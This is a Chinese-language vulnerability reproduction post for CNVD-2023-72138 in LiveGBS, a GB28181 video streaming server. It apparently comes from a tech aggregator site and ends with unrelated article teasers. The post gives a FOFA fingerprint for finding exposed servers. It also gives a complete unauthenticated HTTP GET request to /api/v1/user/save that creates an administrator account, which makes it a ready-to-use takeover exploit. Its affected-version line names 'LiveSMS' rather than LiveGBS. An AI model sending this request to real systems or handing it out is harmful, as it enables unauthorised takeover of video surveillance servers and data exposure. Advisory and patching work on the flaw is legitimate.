LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)

0x01 产品简介

LiveGBS是安徽青柿信息科技有限公司研发的一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。

0x02 漏洞概述

LiveGBS user/save 接口处存在逻辑缺陷漏洞,未经身份验证的攻击者可利用该漏洞任意添加用户,导致后台服务被接管,造成信息泄露等不良影响。

0x03 影响范围

LiveSMS <= v3.2.x

0x04 复现环境

FOFA:icon_hash="-206100324"

0x05 漏洞复现

PoC

GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close

创建管理员账户

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/660187.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

OFDM802.11a的FPGA实现(八)二级交织(含verilog和matlab代码)

目录 1.前言2.Verilog代码3.Matlab仿真4.ModelSim仿真 1.前言 上一节实现了一级交织&#xff1a;分组交织器&#xff0c;这节接着进行第二级交织的实现。需要注意的是只有data域需要第二级交织&#xff0c;而signal域不需要。二级交织比较简单&#xff0c;作者直接调用了前面的…

mysql UNION 联合查询

mysql UNION 联合查询 业务需要拉数据&#xff0c;这里需要对查询不同格式的数据进行组装&#xff0c;此处采用联合查询 注意1&#xff1a;null as 设备关爱 &#xff0c;结果为null&#xff0c;表头为设备关爱 注意2&#xff1a; UNION 或者 UNION ALL 联合查询自行选用 注意3…

Steam农场管理节现已正式开启,限时免费领取头像边框动画贴纸

Steam农场管理节现已正式开启&#xff01;限时免费领取头像边框/动画贴纸 大家好&#xff0c;最新消息&#xff01;Steam农场管理节已经正式开启啦&#xff01;这次游戏节将持续一周&#xff0c;从2024年4月30日凌晨1点开始&#xff0c;一直持续到2024年5月7日凌晨1点结束。 …

Qt QLineEdit详解

1.简介 QLineEdit是一个单行文本编辑器。 行编辑允许用户使用一组有用的编辑功能输入和编辑单行纯文本&#xff0c;包括撤消和重做、剪切和粘贴以及拖放。 通过更改行编辑的echoMode&#xff0c;它也可以用作“只写”字段&#xff0c;用于密码等输入。 文本的长度可以限制为ma…

物联网D1——建工程,配环境,注意事项

1.STLink、JLink、USB等驱动配置keil环境配置——下载芯片对应型号的包——导入库函数源文件、Core内核文件、对应芯片系统文件。 2.学会看芯片手册 3.在STM32微控制器中&#xff0c;CRH通常指的是控制寄存器高位&#xff08;Control Register High&#xff09;。 在这种情况下…

UDP!!!

UDP!!! 一 : 传输层的协议:二 : UDP2.1 UDP长度2.2 UDP校验和2.2.1 : 为什么会出现传输出错的情况??2.2.3: 对数据进行校验的方式CRCmd5 三 : UDP的适用场景 一 : 传输层的协议: 传输层的协议有UDP,TCP UDP:无连接,不可靠传输,面向数据报,全双工 TCP:有连接,可靠传输,面向字…

【MySQL】A01、性能优化-参数监控分析

1、参数监控 1.1、MySQL command 查看 mysql>SHOW STATUS; &#xff08;服务器状态变量&#xff0c;运行服务器的统计和状态指标&#xff09; mysql> SHOW VARIABLES;&#xff08;服务器系统变量&#xff0c;实际上使用的变量的值&#xff09; mysql> SHOW STATUS …

一曲《少年中国说》令人情怀激荡

今天&#xff0c;作为四川籍人的本“人民体验官”&#xff0c;将充满自豪感地推广人民日报官方微博文化产品《看我中国少年&#xff01;川传学子热血合唱少年中国说》。 图片&#xff1a;来源“人民体验官”推广平台 人民微博说&#xff1a;“百年前&#xff0c;梁启超先生一篇…

Mellanox网卡打流命令ib_write_bw执行遇到Couldn‘t listen to port 18515原因与解决办法?

要点 要点&#xff1a; ib默认使用18515命令 相关命令&#xff1a; netstat -tuln | grep 18515 ib_write_bw --help |grep port# server ib_write_bw --ib-devmlx5_1 --port 88990 # client ib_write_bw --ib-devmlx5_0 1.1.1.1 --port88990现象&#xff1a; 根因&#xf…

OpenFeign的超时控制

OpenFeign的超时控制 本文将从以下几个方面记录自己学习的OpenFeign超时控制笔记 何为超时控制有哪几类超时控制OpenFeign默认的超时控制规则如何自定义超时控制 1.何为超时控制 通过实操加上官网介绍个人理解为当一个微服务调用另一个微服务时&#xff0c;发送请求后超过设…

S参数定义

S11:端口2匹配时,端口1的反射系数; S22:端口1匹配时,端口2的反射系数; S12:端口1匹配时,端口2到端口1的反向传输系数; S21:端口2匹配时,端口1到端口2的正向传输系数; 对于互易网络,有:S12S21; 对于对称网络,有:S11S22 对于无耗网络,有:(S11)2(S12)21

基于ssm+vue开放式教学评价管理系统【ppt·代码·文档报告】

项目演示视频 项目名称&#xff1a;开放式教学评价管理系统 系统介绍&#xff1a;本系统是通过java的SSM框架来实现的&#xff0c;前端采用vue框架进行实现 管理员通过登录进入到系统操作界面&#xff0c;结合需求可以对个人信息进行在线修改维护&#xff0c;也可结合需求进行…